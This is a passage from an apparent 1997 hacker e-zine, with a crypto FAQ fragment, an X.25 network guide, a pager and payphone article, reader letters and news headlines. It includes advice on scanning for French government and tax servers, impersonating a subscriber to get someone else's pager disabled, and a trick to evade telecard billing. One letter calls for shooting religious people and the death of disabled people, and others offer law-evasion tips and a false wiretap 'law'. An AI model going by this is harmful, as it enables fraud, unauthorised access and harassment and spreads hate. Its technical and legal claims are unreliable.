  779. different 'parts' of the key.
  780.  
  781. A software-based attack is much slower but is also much cheaper to mount. For 
  782. example, using an algorithm with a 56 bit key, a software attempt run on 512 
  783. workstations capable of running the algorithm at a rate of 15,000 encryptions 
  784. per second, running 24 hours per day would require 545 years to test all 
  785. possible numbers (Bruce Schneier, Applied Cryptography c.1995) . Importantly, 
  786. with a 40 bit key (the only key length currently allowed for export under 
  787. federal legislation) a similar network would take just under two days to 
  788. complete the attack.
  789.  
  790. A 128 key makes brute force cryptanalysis effectively useless, even when 
  791. factoring estimates for increases in the number of networked computers in the 
  792. world and increasing processor speed. However, it is still susceptible to 
  793. factoring methods when distributed among several computers. The next logical 
  794. question is, why not use keys with a very large number of bits (>2000)? The 
  795. answer lies in the tradeoff between security and usability. The longer the 
  796. key length the longer the time needed for encryption. Encryption over a LAN
  797. environment should not be a bottleneck in the communications.
  798.  
  799. 7) What is RSA?
  800.  
  801. RSA is the industry standard for public key cryptography. Its algorithm is 
  802. based on the difficulty of factoring large numbers. Encryption is performed 
  803. 'one-way', indicating that f(x) is the encryption function but f-1(x) is very 
  804. hard to compute. 
  805.  
  806. 8) What is DES?
  807.  
  808. Data Encryption Standard (DES) is the standard for private key encryption and 
  809. is recognized by international standards organizations such as ANSI and ISO. 
  810. Standard encryption schemes are needed to ensure interoperability of systems 
  811. for the same reasons standards are needed for all network applications. The 
  812. most important criteria for a standard (and in fact any) cryptographic scheme 
  813. is that the security must rely on the key and not in the secrecy of the 
  814. algorithm. By the definition of encryption, simply deducing the algorithm 
  815. should not make it any easier to decrypt messages. 
  816.  
  817. DES uses the same key for encrypting as decrypting. This encryption is not 
  818. based on the difficulty of factoring large numbers but is based on a set of 
  819. non-linear transformations. The key can be any 56-bit number and there are 
  820. few weak keys. A good example of a weak key is one that is all 0's or 1's. 
  821. This encryption is not based on the difficulty of factoring large numbers but 
  822. is based on a set of non-linear transformations. DES is a single combination 
  823. of operations, substitution followed by permutation, performed on the message 
  824. based on the key and on a set of constant values (the algorithm). This 
  825. function is repetitive and so can be easily implemented using hardware, 
  826. making it a very fast solution for encryption.
  827.  
  828. 9) What is a Substitution?
  829.  
  830. A substitution is quite easy to understand. Letters of the alphabet can be 
  831. randomly substituted for other letters according to a key as follows:
  832.  
  833. a b c d e f g...
  834. q s l b z e r...
  835.  
  836. This substitution key is held by both the person coding the message and the 
  837. person decoding the message. The key is simply the substitution of the number 
  838. of letters in the alphabet (and could include the space-value). Therefore the 
  839. number of permutations is simply 26!. A very large number which could not be
  840. analyzed by brute force. However, this simple type of encryption can easily 
  841. be analyzed using other methods.
  842.  
  843. 10) What is a Permutation?
  844.  
  845. A permutation does not involve changing the values of the plaintext. A 
  846. permutation alters their position but leaves the character values unchanged. 
  847. The method is performed mathematically using a permutation matrix in which 
  848. each row contains only one '1' for the row of size 'm'. The best way to 
  849. illustrate this is through a simple alphabetic example:
  850.  
  851. We will use the following key (m=4)Value: 1 2 3 4 Key: 3 4 1 2 to encrypt the 
  852. following: howareyou. 
  853. First arrange in groups: howa|reyo|u 
  854. Perform the permutation: wahoyoreu 
  855. Decrypt with the inverse key.
  856.  
  857. DES functions by first dividing the initial text (bitstring) of length 64 
  858. bits, into two halves (32 bits). The 32 bit string is expanded to 48 bits. An 
  859. initial permutation is performed on the bitstring according to a function
  860. derived from the encryption key. The DES algorithm then performs a set of 
  861. constant substitution functions using 8 S-boxes followed by the permutation 
  862. (An S-box is the term for a 4x16 matrix which is used to perform the 
  863. substitution on the bitstring of length, 48 bits). This is followed by a 
  864. round of key-based encryption using 48 of the 56 bits in the key. The whole 
  865. set of functions is repeated 16 times.
  866.  
  867. ═────────────────────────────────────────────────────────────────────────────═
  868. ┌──────────────────────────────────────┐
  869. │ The X.25 goods - by memor            │ 
  870. └──────────────────────────────────────┘
  871.  
  872. 1. What is X.25 ?#
  873. ##################
  874.  
  875.      Different Network, really far for links use that protocol and equipment 
  876. named X.25, lots of networks like Transpac, Datapac, Tymnet use that X.25 
  877. Protocol.. It uses a hardware named PAD X.25 
  878. (Packet Assembler/Dissassembler). Users are connecting to those PADs from a 
  879. phone number with a or from a tcp/ip gateway from Internet, or from
  880. another ways.. and from those PADs, they connects the X.25 servers with 
  881. the command connect (c), you can also configure a lot of parameters for your 
  882. connection (when you'll lost the connection, parameters will be defaults 
  883. again.) with the commands full or half (full duplex, half duplex), the 
  884. command set for the PAD parameters, the command par? is for displaying the
  885. PAD parameters, stat displays your port address on the PAD. for 
  886. disconnecting, here is the command bye or disconnect.. with that hardware, 
  887. when connecting it, setting a right user ID, (if you can connect reverse 
  888. charging calls host), you must know that any network has a prefix (dnic) for 
  889. instance : 02080 is for Transpac in France.. 03110 is for telenet in USA. (of 
  890. course, with the USER ID is required a PASSWORD.. that would be so easy ID 
  891. xxxxxx is for the user id, and it will ask for a password after.)
  892.  
  893. 2. here are the prefixs of some networks you can connect o with an x.25 pad:#
  894. #############################################################################
  895.  
  896.      02080 is Transpac / France
  897.      02342 is PSS / England
  898.      02405 is Telepak / Sweden
  899.      02624 is Datex-P / Germany
  900.      03106 is Tymnet / USA
  901.      03110 is Telenet / USA
  902.      04251 is Isranet / Israel
  903.      05252 is Telepac / Singapore
  904.  
  905. . Talking about Transpac / France (02080) :#
  906. ############################################
  907.  
  908.      Transpac is the X.25 French network that anyone can use to connect to a 
  909. PAD in france with the numbers 3617 3615(those are expensive to call) 3614 or 
  910. 3613 (less expensive ones),...with those different numbers, you can connect 
  911. to different services.. the most interesting services are on the expensive 
  912. numbers and the government/companies ones with passwords and logins are on 
  913. the less expensive ones. those hosts have an x.25 address and a nabx25.
  914.  
  915. . What is a nab X.25?#
  916. ######################
  917.  
  918.      a NABX25 in french mean Nom AbrΘgΘ X.25, in american language, i will 
  919. call it an X.25 Abriged NAME, that means for each nua (x25 adress), you have 
  920. a name that u type it on those services to connect to it quickly without 
  921. having to remember its nua (anyways, french dont know nabx25 is for,
  922. they can connect to the hosts with the nua) 
  923. example : for nabx25 TEASER (french server of Upload / Download in 1200 
  924. Bauds), has the nua of 0208078270373.
  925. On the minitel keyboard (Terminal + Modem to call those 361x numbers, you 
  926. can directly type the nua, replacing the 02080 by 1 (1 is france) so it 
  927. would be 178270373 )
  928.  
  929.  
  930. . What is minitel and Videotex ?#
  931. #################################
  932.  
  933.      "Minitel" is the name of that 'modem and terminal' integrated for 
  934. connecting Videotex phone numbers like 3617, 3616, 3615, 3614, 3613, 
  935. 3606xxxx, 3605xxxx ... it is sold and rented by France Telecom in their 
  936. agencies but can be easily replaced by an US Robotics sportster, by setting 
  937. on the V.23 modulation (1200/75 bauds) changing the register S34 to 8 with 
  938. ATs34=8&w (&w for saving the new settings.) or by a V.23 modulation modem 
  939. called CAP.23, not expensive at all.. 
  940.  
  941.  
  942.      Videotex is a Graphism Virtual Terminal.. not ansi like the VT, but 
  943. Videotex, with a lot of graphics functions i explained in some thtj issues, 
  944. before.. you can anyways download one of those videotex terminals..
  945.  
  946.      for modems connecting, they are named olicom, minitel.. (www.yahoo.com, 
  947.      search to minitel/videotex)
  948.  
  949.      for telnet connecting (to those tcp/ip minitels), they are on 
  950. http://www.minitel.fr or on www.mctel.fr (VTX plug is the name of that 
  951. program for win95/3.11)
  952.  
  953.      For Linux, Videotex terminals exist to save videotex pages and for
  954. connecting via modem or telnet (check www.yahoo.com here too..)
  955.  
  956. 3. Some Telnet servers to connect for accessing Transpac nabx25 or nua :#
  957. #########################################################################
  958.  
  959.      first, you can connect free that MGS nab25 server, which permit you to 
  960. search (like yahoo) any nabx25 server for the domain you want, by connecting 
  961. on port 25 on www.minitel.fr , with the login minitel.. If you want more 
  962. services, with access to a x25 pad, you need to have that damn credit card.. 
  963. or to hack some ID and PASSWD, the security of that server is hum.. not too 
  964. bad, it got totally hacked one time before if i remember, but now it seems 
  965. pretty secure, logs are checked by france telecom guys every days and the 
  966. (new?) root seems to be more intelligent. that "videotex" site can allow you 
  967. to work on it with ansi, so your telnet client will work on it.
  968.  
  969.      Secondly, strictly videotex, you can connect with VTX-PLUG to 
  970. www.mctel.fr , to those X.25 PADS, first, FREE you can connect the services 
  971. MGS and 3611 (MGS is that search engine for any nabx25 server and 3611 is a 
  972. search engine for any info of any guy in France) (VTX-PLUG connect on port 
  973. 516 of www.mctel.fr) or connect services 361x with an ID and PASSWD.. 
  974.  
  975.      With you damn modem, you can also connect to the 361x services from 
  976. foreign country with a modem videotex terminal (or minitel) to +33 8 36 43 15 
  977. 15 for 3615 service, +33 8 36 43 14 14 for 3613 service, or +33 8 36 43 13 13 
  978. for 3613 service. You can connect a good old x.25 pad by calling +33 8 36 06 
  979. 44 44 (Transpac one) , for connecting to that old compuserves, can be called 
  980. those ones too +33 8 36 06 96 96 (9600 bauds) or +33 8 36 06 24 24 (2400 
  981. bauds one) .
  982.  
  983. 4. How do we connect servers.. method ?#
  984. ########################################
  985.  
  986. We connect servers with that first number of the nua (1 for france.. the 
  987. others numbers from a 361x service are forbidden.. only connect Transpac or 
  988. Gateways) 1 is France(or 02080 if you connects it from a telenet or another 
  989. network)
  990.  
  991. after that, we put the 2 numbers of the departement where is located the 
  992. server.. (a departement is like a state in the US.)
  993.  
  994. . Here is the France Departements list:#
  995. ########################################
  996.  
  997. #####
  998. 01  # ain
  999. 02  # aisne
  1000. 03  # allier
  1001. 04  # alpes hautes provence
  1002. 05  # hautes alpes
  1003. 06  # alpes maritimes
  1004. 07  # ardeche
  1005. 08  # ardennes
  1006. 09  # ariege
  1007. 10  # aube
  1008. 11  # aude
  1009. 12  # aveyron
  1010. 13  # bouches du rhones
  1011. 14  # calvados
  1012. 15  # cantal
  1013. 16  # charente
  1014. 17  # charente-maritime
  1015. 18  # cher
  1016. 19  # correze
  1017. 20  # corse
  1018. 21  # cote d'or
  1019. 22  # cote d'armor
  1020. 23  # creuse
  1021. 24  # dordogne
  1022. 25  # doubs
  1023. 26  # drome
  1024. 27  # eure
  1025. 28  # eure et loir
  1026. 29  # finistere
  1027. 30  # gard
  1028. 31  # haute garonne
  1029. 32  # gers
  1030. 33  # gironde
  1031. 34  # herault
  1032. 35  # ille et vilaine
  1033. 36  # indre
  1034. 37  # indre et loire
  1035. 38  # isere
  1036. 39  # jura
  1037. 40  # landes
  1038. 41  # loir et cher
  1039. 42  # loire
  1040. 43  # haute loire
  1041. 44  # loire atlantique
  1042. 45  # loiret
  1043. 46  # lot
  1044. 47  # lot et garronne
  1045. 48  # lozere
  1046. 49  # maine et loire
  1047. 50  # manche
  1048. 51  # marne
  1049. 52  # haute marne
  1050. 53  # mayenne
  1051. 54  # meurthe et moselle
  1052. 55  # meuse
  1053. 56  # morbihan
  1054. 57  # moselle
  1055. 58  # nievre
  1056. 59  # nord
  1057. 60  # oise
  1058. 61  # orne
  1059. 62  # pas de calais
  1060. 63  # puy de dome
  1061. 64  # pyrenees atlantiques
  1062. 65  # hautes pyrenees
  1063. 67  # bas rhin
  1064. 68  # haut rhin
  1065. 69  # rhone
  1066. 70  # haute saone
  1067. 71  # saone et loire
  1068. 72  # sarthe
  1069. 73  # savoie
  1070. 74  # haute savoie
  1071. 75  # paris
  1072. 76  # seine maritime
  1073. 77  # seine et marne
  1074. 78  # yvelines
  1075. 79  # deux sevres
  1076. 80  # somme
  1077. 81  # tarn
  1078. 82  # tarn et garonne
  1079. 83  # var
  1080. 84  # vaucluse
  1081. 85  # vendΘe
  1082. 86  # vienne
  1083. 87  # haute vienne
  1084. 88  # vosges
  1085. 89  # yonne
  1086. 90  # territoire de belfort
  1087. 91  # essonne
  1088. 92  # hauts de seine
  1089. 93  # seine satin denis
  1090. 94  # val de marne
  1091. 95  # val d'oise
  1092. #####
  1093.  
  1094. After that, the next 6 numbers are the servers numbers.. mostly if you scan, 
  1095. you will find servers on 060xxx 021xxx 270xxx 118xxx 190xxx 001xxx 911xxx 
  1096. 201xxx 010xxx 160xxx, but well remember that you can find servers on any 
  1097. xxx000 to xxx999.
  1098.  
  1099. For instance, if you need to know the amora x.25 server adress, try to scan 
  1100. 121xxxxxx (1 is france , 21 is cote d'or, where is located amora company)
  1101. if you need to scan for a government or france telecom x.25 server, scan on
  1102. 175xxxxxx (1 is france and 75 is paris.. where governement is mostly..)
  1103. for another Taxes server, try on 167xxxxxx (1 is france and 67 is 
  1104. Stransbourg, where is a Taxes server.) Do a random scanning, nua scans are 
  1105. illegal and detected in France.
  1106.  
  1107. After those numbers, we can (not needed sometimes) 2 nod numbers for 
  1108. choosing the service you want to connect in that host.. (on the nabx25, the 
  1109. nod have a name too which can be another nabx25 for the same host.) like 
  1110. 13506031801 is for connecting the restricted service of a french cops/lame 
  1111. server.
  1112.  
  1113. 5. Some nua (0208) for some Transpac Server :#
  1114. ##############################################
  1115.  
  1116.      0208078270383  Teaser Server (Download/Upload mostly, Email access)
  1117.      0208078270363  Teaser Server (gives you back you adress and nod argument)
  1118.      0208059161009   Some Server
  1119.      020806700130244 Taxes Server in VT100 
  1120.      
  1121. . Note :#
  1122. #########
  1123.  
  1124.      Yes, you can connect not only Videotex terminal servers, you can connect 
  1125.      good old vt100-320 , ansi servers, its why it can be interesting for 
  1126.      americans and others to scan it, they could find bank services, telnet 
  1127.      gateways (back to internet), compuserves one (bah..) , ...
  1128.      
  1129.      020807813014614 Cars Selling Server
  1130.      020809118070705 Some server
  1131.      ...
  1132.      
  1133. . Some NABX25 :#
  1134. ################
  1135.  
  1136.      telnet Telnet Gateway 
  1137.      Teaser Teaser Server (Download/Upload mostly, Email access)
  1138.      Impots Financial Server
  1139.      CNX    Mail Server
  1140.      CHEZ   Mail Server
  1141.      AKELA  Some Server
  1142.      AAA    Some Ladies/Dudes Server
  1143.      
  1144. Have fun with that.
  1145. memor.
  1146.  
  1147.      DIAGO  Chess Playing server
  1148.  
  1149.  
  1150. # memor / hbs # memor@stepahead.net
  1151.  
  1152. ═────────────────────────────────────────────────────────────────────────────═
  1153. ┌─────────────────────────────────────┐
  1154. │ Beyond HOPE review - by AlienPhreak │ 
  1155. └─────────────────────────────────────┘
  1156.  
  1157. As some of you might of heard Beyond Hope was held in the Big Apple a couple 
  1158. weeks ago. I can personally say it sucked. There were only a few occasions 
  1159. when I actually enjoyed being there. 
  1160.  
  1161. I thought there would be much more hacking and phreaking going on but it 
  1162. ended up with the juarez puppy in everyone coming out to take advantage of 
  1163. the T1 line Nynex so anonymously supplied. I learned only one thing which was 
  1164. (I don't know much about cellular) how to scan and listen in on peoples' 
  1165. cellular calls through a motorola flip phone. 
  1166.  
  1167. I did enjoy the Bernie S. and Phiber Optik speeches. I'm sure we all know 
  1168. about Bernie S, he seemed very intelligent but I think he did have illegal 
  1169. possessions (aka Red Box) and in all honesty boxing is outdated and rather 
  1170. lame. He certainly wasn't what I'd consider a phone wiz. Still there was no 
  1171. reason for him to go to five high security prisons serving time with some big 
  1172. black guy named Bubba. Phiber Optik is someone that I actually admire, 
  1173. because he knew his shit.
  1174.  
  1175. After a while the cDc came on and just ruined everything. What can I say 
  1176. about Death Veggie? He's fucking stupid! Also Beyond HOPE was sponsored by 
  1177. 2600 *coughselloutcough* So I saw some t-shirts going around and them selling 
  1178. more of their FREE INFORMATION, but I had to pitch in and buy an "owned" 
  1179. shirt. I *might* go to the next HOPE if they keep the cDc out of it and have 
  1180. a decent lineup.
  1181.  
  1182. ═────────────────────────────────────────────────────────────────────────────═
  1183. ┌──────────────────────────────────────┐
  1184. │ Tatoo pager info and more - by memor │ 
  1185. └──────────────────────────────────────┘
  1186.  
  1187. A little way to call Tatoo pagers easily from French payfones
  1188. by memor/hbs memor@mygale.org 
  1189. http://www.mygale.org/00/memor
  1190. ******************************
  1191.  
  1192. !Remember!
  1193. ----------
  1194.  
  1195. Tatoo is a pager made by France Telecom and Motorola available in France.
  1196. it is called via the number 0604xxxxxx
  1197. or from a foreign country it is +33 604xxxxxx
  1198. ATDT 0604xxxxxx,,,,numberyouwantthepersoncall,,,# can be a way from a
  1199. modem to call and send a numeric page
  1200. With an operator, u can send alphanumeric messages.
  1201. With a "manual" way, u use your phone and call
  1202. the 0604xxxxxx, you wait for the recorded voice asking in French
  1203. to type the number you want to be called at, you type the number
  1204. and after it, type # and Hang Up, the message will be sent. The person
  1205. will receive it 10 mins after, time for the slow france telecom 
  1206. relays and computers to transmit the numeric message.
  1207.  
  1208. !Here is how to invalidate a Tatoo from an annoying dude
  1209. (please keystroke, dont do it on me hehe)!
  1210.  
  1211. well, you have to phone that number reserved for tatoos users which
  1212. is.. 08 36 60 40 20 (+33 8 36 60 40 20 for foreign countries i guess)
  1213. ask the operator with your french voice to,
  1214. "je suis le tatoo numero 08 06 xx xx, quelle est ma zone de reception"
  1215. you will ask the operator where does the pager receive messages
  1216. she will answer a "district" like paris, or south of france, or another
  1217. thing..  and tell her after that "je demenage en zone <autre zone>"
  1218. you will tell the operator to change the district to another one,
  1219. so the pager wont receive message after that.. and the annoying person
  1220. wont be contacted again.. 
  1221.  
  1222. now, something about French payfones..
  1223. you use a "telecarte" or telecard with fone money utilities..
  1224. 1 unit = 0.73 ff
  1225.  
  1226. its a normal telecard
  1227.  
  1228. *******************************
  1229. *                      *****  *
  1230. *             chip---> *   *  *
  1231. *                      *****  * -> insert it in the payfone thing...
  1232. *                             *
  1233. * some ads here               *
  1234. *******************************
  1235.  
  1236. the payfone works like that with the telecard..
  1237.  
  1238. you dial the fone number you want to call
  1239. the payfone checks if you called a free fone number or a number you have to 
  1240. pay for; if its a free fone number, it continues without checking if a card 
  1241. is in the payfone.
  1242.  
  1243. **if its a pay fone number
  1244. the payfone will verify that a telecard is in the payfone
  1245. if not.. it will disconnect you and beep
  1246. if yes:
  1247. you connect to the number
  1248. <a delay>
  1249. the payfones send the signal to kill a unit in the telecard
  1250. <a delay>
  1251. payfone waits the telecard send the signal that the unit got killed
  1252. if signal received.., continue conversation at phone
  1253. if signal lost.., disconnect the phone conversation
  1254. if signal that telecard is empty.., ░see if signal lost
  1255.  
  1256. well.. during those delays you have time to put a little paper
  1257. between the telecard and the payfone reader/writer like this:
  1258.  
  1259.                  /»reader/writer of the payfone
  1260. ---------***\/***----------
  1261. -------------------------------------< paper
  1262. ---------********- <- telecard with *** chip
  1263.  
  1264. and so you will have 5 seconds (the delay) to type the number you want the 
  1265. person to call you back and '#' before the payfone see that there is no card 
  1266. and hang up on you.. but well that service costs like 1$us for a numeric
  1267. message so it can be interesting not having to pay for it :)
  1268.  
  1269. memor.
  1270.  
  1271. ═────────────────────────────────────────────────────────────────────────────═
  1272. ┌──────────────────────────────────────────────────┐
  1273. │ Help-a-phreak, come to us when you're desperate! │ 
  1274. └──────────────────────────────────────────────────┘
  1275.  
  1276. The problem is this: a phreak named moloch tried using 800-487-9240 to do an 
  1277. ani.  The number returned a recorded message stating "ARU ID is echo-7-
  1278. alpha". Two other messages could also be heard when dialing this number, 
  1279. "caller interactive is 9900" and "line number is 0". What do these messages 
  1280. mean? It's the question the telcos can't even answer... after conversations 
  1281. with Bell Atlantic, Lucent Technologies, AT&T, MCI, and his local telco, 
  1282. moloch has yet to find the answer he's looking for. He's been told by the 
  1283. local branches that it's a network code, and the larger telcos say it's a 
  1284. trunk issue. He's gotten the same messages when attempting an ani from 
  1285. payphones, regular phones, and on the wm.edu digital phone network. He's 
  1286. tried special services, network services, hardware services, residential 
  1287. services, long distance services, general tech support, and trunk support, 
  1288. but to no avail. Have any of you, the readers, heard any messages like these? 
  1289. Do you know what these messages mean? If so, let us know, or you can answer 
  1290. to moloch yourself, at craqhore@multic.ml.org
  1291.  
  1292. Help your fellow phreak in his time of need! You'll feel better about 
  1293. yourself, even if you think you're still a loser!
  1294.  
  1295. ═────────────────────────────────────────────────────────────────────────────═
  1296. Oh No! It's that time again - it's....
  1297. ┌──────────────────────────────────────────────┐
  1298. │ Oddville, THTJ - compiled & edited by Scud-O │ 
  1299. │ Letters from a place far freakier than LA    │
  1300. └──────────────────────────────────────────────┘
  1301.  
  1302. ---
  1303.  
  1304. X-Sender: f0k
  1305. X-Mailer: Windows Eudora Light Version 3.0.1 (32)
  1306. Date: Wed, 07 May 1997 22:15:10 -0500
  1307. To: sin@hyper-media.net
  1308. From: f0k of the Night 
  1309. Subject: hi
  1310.  
  1311. hello everyone.  Id be f0k. (no, Im not black, but I felt the need to refer
  1312. to myself in third person, using the word 'be') I will list to you some of
  1313. my beliefs, so if/when we ever talk, you'll know alittle about me.
  1314.  
  1315. 1) I feel any and all information should be free.
  1316. 2) I believe anyone who stands in the way of my gathering of information
  1317.  is a communist/socialist pig.  These types of ppl should be shot on
  1318.  sight.
  1319. 3) I dont believe in the devil... or god.
  1320. 4) I think anyone who believes in god is weak, selfish and inferior
  1321. 5) I know Im right, always (unless I change my mind, inwhich case...
  1322.  I get to be right some more =])
  1323. 6) I believe in Zero Tolerance politics.  If you fuck up, you die. If you
  1324.  cant provide for yourself you die.  Let the
  1325. weak/uninspired/lazy/retarded/handicaped filter themselves out.  It works
  1326.  for many other species.
  1327. 7) I believe 2600 to be a Commercial 'wh0re' of sorts.
  1328. 8) I believe Bill Clinton is imbred, there for inferior geneticly and should
  1329.  be eliminated.  As to avoid Another little Chelsea Clinton
  1330. 9) I believe if your still reading this, your one sick mother fucker =]
  1331. 10) I believe I have all the answers and if you follow me you will reach
  1332.  a higher state of awareness and enlightment.  I also charge 20 bux an hour
  1333.  for group therapy.
  1334. 11) I think Jews, Christians, and all other ppl "of faith" should be
  1335. coralled  up in a cage and shot.  You are weak.  Your religions are all
  1336. relics.  You
  1337.  are the enemy to the Technological Era.  Im an equal rights discriminator.
  1338.  I dont care what religion you are, unless you are a f0kist and follow
  1339. f0kism,   you are weak.
  1340.  
  1341. pretty pimpy eh?  There, thats me in a bottle.  Spray it on yerself to
  1342. attract all the fellas.  Tell your friends and your neighbors.  w00h00
  1343.  
  1344. -f0k-
  1345. .aS$$$$$$$$$$$$$$$$$$$$$$$$$$$$Sa.
  1346. $$'   ,   `$P'  ,  `S$    $    $$$
  1347. $$    $    $    P    $    $    $$$
  1348. $$    $ssss$    H    $       .s$$$
  1349. $$         $    E    $    a    $$$
  1350. $$    $$$$$$    E    $    $    $$$
  1351. $$s.  $$$$$$.   R   .$s.  $    $$$
  1352. `Q$$$s$$$$$$$$sssss$$$$$$s$$$$$$P'
  1353.  
  1354.   [ The f0k manifesto - know it well, roflol ]
  1355.  
  1356. ---
  1357. {Several spelling errors have been corrected in the following email}
  1358. Date: Wed, 6 Aug 1997 02:41:05 -0400 (EDT)
  1359. X-Sender: phraud@mail.interlog.com
  1360. X-Mailer: Windows Eudora Light Version 1.5.4 (16)
  1361. To: scud@thtj.com
  1362. From: REBEL LOGiC <phraud@interlog.com>
  1363. Subject: Article
  1364.  
  1365. Greets,
  1366.  
  1367. I have an article you might consider worth publishing. Here ya go:
  1368.  
  1369.                                                       PARANOIA
  1370.                                                       ~~~~~~~~~
  1371.  
  1372. By: Rebel Logik
  1373.  
  1374. For those of you that are not naturally "paranoid" you have my sympathies.
  1375. But, buy reading this file you can improve your caution, senses, and
  1376. down-right insecurity. 
  1377.  
  1378. 1. Wear dark clothing: Blues, Blacks etc. etc. Also wear things that hide
  1379. your face, hoods, hats etc.
  1380.  
  1381. 2. Always, always look around you for unwanted types (FEDS, Cops, RCMP, CIA,
  1382. NSA) who can usually be pinpointed by wearing a certain type of clothing.
  1383. Usually suits, sunglasses, basically just MIB's. These foul beings can
  1384. reside anywhere. Your school, your alley, family gatherings (it could easily
  1385. be the ones you love most that do you in!", party's and other social places.
  1386.  
  1387. 3. Always be privy to local escape routes. Such as fireescapes, backdoors
  1388. etc. These are handy when encountered with a bust.
  1389.  
  1390. 4. If you happen to see any law enforcement vechicles or telco vehicles in
  1391. your neighborhood cease all illegal activity for a number of days until THEY
  1392. are gone.
  1393.  
  1394. 5. Encrypt your Hard-Drive using some encryption utility. Also, (although
  1395. easily cracked) put windows passwords on everything. After a large "project"
  1396. burn or destroy excess paper with information.
  1397.  
  1398. 6. Always Op-Divert, and call from payphones when dialing illegally setup
  1399. teleconferences. Be aware that OCI has an ANI!
  1400.  
  1401. 7. If you think you are being tapped, and cannot be bothered to go to a
  1402. payphone: Always talk about bullshit first while discussing an illegal
  1403. activity. After 2 or so minutes  of talking about lunch, family members,
  1404. cars etc. They will be forced to hang up and stop the tap. This is called
  1405. the "transmission" law. If after a certain amount of time (2-5 minutes)if
  1406. they still cannot hear you discussing anything of illegal nature they are
  1407. FORCED by LAW to quit listening in.
  1408.  
  1409. 8. Stay away from drugs while doing important things or you'll fuck them up!
  1410. Drugs are okay if you want to lie on your coach eating pizza. That's all!
  1411. Try to IPSPOOF while stoned and the FEDS are at your door 5 minutes later!
  1412.  
  1413. 9. When beige boxing or doing anything else that's illegal and phone
  1414. related: Always do it at night and in a secluded area. I know this sounds
  1415. like common sense but some phreaks.......
  1416.  
  1417. Well, I hope you enjoyed this file!
  1418. And remember.....
  1419.  
  1420. "Even paranoids have real enemies"-Delmore Schwartz
  1421.  
  1422. Well, there it is. Respons with yer response. err....
  1423.  
  1424. Later,
  1425. Rebel_Logik
  1426.  
  1427. ---
  1428.  
  1429. From: evilchic@nwlink.com
  1430. To: "'sin@hyper-media.net'" <sin@hyper-media.net>
  1431. Subject: FW: i want to be a sinner yeah i want to be a sinner
  1432. Date: Wed, 6 Aug 1997 13:34:19 -0700
  1433.  
  1434. Why the fuck is it that I get all these lame ass emails that make no sense???
  1435.  
  1436. Suz
  1437.  
  1438.  
  1439. -----Original Message-----
  1440. From:     b c m [SMTP:sandworm666@juno.com]
  1441. Sent:     Tuesday, August 05, 1997 12:49 PM
  1442. To:  webmistress@sinnerz.com
  1443. Subject:  i want to be a sinner yeah i want to be a sinner
  1444.  
  1445. sin sin sin sin sin sin sin sin sin sin sin sin sin sin
  1446.                 i want to sin
  1447. sin sin sin sin sin sin sin sin sin sin sin sin sin sin
  1448.  
  1449. i am kewl i am, they accepted me into those kool aol lamerz clubz
  1450. yeah right i wouldnt join one of those stupid ass things
  1451.  
  1452. I HATE MOST AOLERS THEY THINK THEY KNOW EVERYTHING
  1453. Trying to TOS my ass well they can fuck themselves with there 
  1454. stupid ASCII Art or IM bombs well fuck em stupid lame ass pussys
  1455. i was doing that shit when i was 9. Yeah they were so fuckin cool.
  1456. Stupid asses threating people on AOL when they cant even fuckiin
  1457. carry it out.   FUCK THEM they want to fuckin attack all the bitches on 
  1458. AOL
  1459. they got to get into AOL setup and fuckin use the nickname that IM's the 
  1460. whole network and fuckin IM bomb everyone on the network.  They want to
  1461. use a fuckin virus they got to break into setup and change the interface
  1462. arround
  1463. when you get art updates they got to switch the art with a virus but they
  1464. are stupid.
  1465.  
  1466.  [ ROFLOL! god do we get some stupid e-mail! ] 
  1467.  
  1468. ---
  1469.  
  1470. From: Elit3Cr4sh@aol.com
  1471. Date: Thu, 7 Aug 1997 17:21:24 -0400 (EDT)
  1472. To: scud@thtj.com
  1473. Subject: thtj
  1474.  
  1475. is there a print issue of this? if so where can i get it
  1476.  
  1477.  [ no, but if you send me about 25$ ill print you up a copy.... ]  
  1478.  
  1479. ---
  1480.  
  1481. Date: Tue, 12 Aug 1997 03:14:40 -0400
  1482. From: SUSAN BURTON <sburton@idt.net>
  1483. Reply-To: sburton@idt.net
  1484. Organization: POOL DISTRIBUTORS,INC.
  1485. X-Mailer: Mozilla 3.01C-IDT-v5  (Win95; U)
  1486. To: scud@thtj.com
  1487. Subject: CELLULAR ACTIVATION??????????????????????????????
  1488.  
  1489. hey do you think you can help me?ive been looking for the equipment or
  1490. hardware to activate a cellular from a home pc.now i know its out there
  1491. and i know its illegal but i cant find where to order this stuff or how
  1492. much it is,do you think you can look in to this for and find where and
  1493. how much the hardware is,and if possible can you find me a file on how
  1494. to activate cellular phones from a home pc thanks i would really
  1495. appreciate it,please right back    SHADOW
  1496.  
  1497.   [ look, i dont have time to do your research. do it yourself!   use the 
  1498.     search engines out there, look with your own eyes! ]
  1499.  
  1500. ---
  1501.  
  1502. Date: Wed, 13 Aug 1997 00:59:35 -0500
  1503. From: Clint Rogers <tennis@linknet.net>
  1504. Reply-To: tennis@linknet.net
  1505. X-Mailer: Mozilla 3.0Gold (Win95; I)
  1506. To: scud@thtj.com
  1507. Subject: suggestion
  1508.  
  1509. Beeper and pager hacking im looking into that or phreaking a pager??
  1510.  
  1511. Clint
  1512.  
  1513.    [  memor has covered a bunch of things with pagers before, and what
  1514.       the fuck do you mean by 'phreaking' a pager? ] 
  1515.  
  1516. ---
  1517.  
  1518. rom: Jungle1416@aol.com
  1519. Date: Tue, 19 Aug 1997 14:31:47 -0400 (EDT)
  1520. To: thtj@thtj.com
  1521. Subject: information
  1522.  
  1523. Hi I really like your new site, and I was wondering if there are catalogs I
  1524. can order because I'm really interested in hacking.  Thanks!
  1525.  
  1526.   [ wtf? if you want hacking info, just search on the internet, there are 
  1527.     no catalogs out there.... ]
  1528.  
  1529. ---
  1530.  
  1531. oh yea, and to the 50 or so people who send me a little message from ICQ
  1532. about getting ICQ, look im not getting it, nor am i planing to. Im to busy
  1533. as it is to bother with that.
  1534.  
  1535. ═────────────────────────────────────────────────────────────────────────────═
  1536.                                 
  1537.                                 --------------   
  1538.                                --=[The News]=--
  1539.                         Compiled & edited by KungFuFox
  1540.                                 --------------
  1541.  
  1542.      1 : Hackers pay Apple its due 
  1543.      2 : Hackers Frolic in the Woods
  1544.      3 : `Spam' foes tie up Usenet     
  1545.      4 : Netly News - HOPE On A Rope 
  1546.      5 : Bell Atlantic-Nynex Merger Gets Final OK   
  1547.      6 : Getting Ready For Internet2   
  1548.      7 : AOL urges its members to protect themselves    
  1549.          
  1550.           "It has always been fun." -Brandon Tartikoff
  1551.  
  1552. ═───────────────────────────────────────────────────────────═ 
